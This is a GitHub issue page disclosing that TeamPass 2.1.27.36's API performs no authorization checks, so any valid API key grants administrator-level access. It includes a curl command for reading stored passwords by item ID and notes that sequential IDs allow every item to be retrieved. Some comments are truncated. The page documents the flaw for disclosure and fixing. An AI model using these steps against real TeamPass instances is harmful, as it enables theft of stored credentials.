-
-
Notifications
You must be signed in to change notification settings - Fork 539
New issue
Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? # to your account
TeamPass API has no authorization checks #2765
Comments
Hey @bstapes , when running the retrieval of password in the "cycle for" i get "{"err":"No results"}" 5x. |
@sata-sa I suspect your instance of TeamPass is not actually storing any secrets. If you look at the If there is no item with that number, you will get Try this:
|
Just complementing this issue, I could find other potential security issues related to user API keys:
|
TeamPass provides several APIs that can be used for programmatic access. None of these API functions perform authorization checks which means that any client with a valid API token is effectively an administrator. Any client with a valid API token can:
It’s important to note that API access is disabled by default.
Steps to reproduce
Retrieve passwords:
curl http://<your Teampass instance>/teampass/api/index.php/read/items/1?apikey=<your key>
Note that the ID for each “item” starts at 1 and increments by 1 for each new item. This makes it easy to retrieve all items stored by Teampass
Add a new admin user
Server configuration
Teampass version:
2.1.27.36
The text was updated successfully, but these errors were encountered: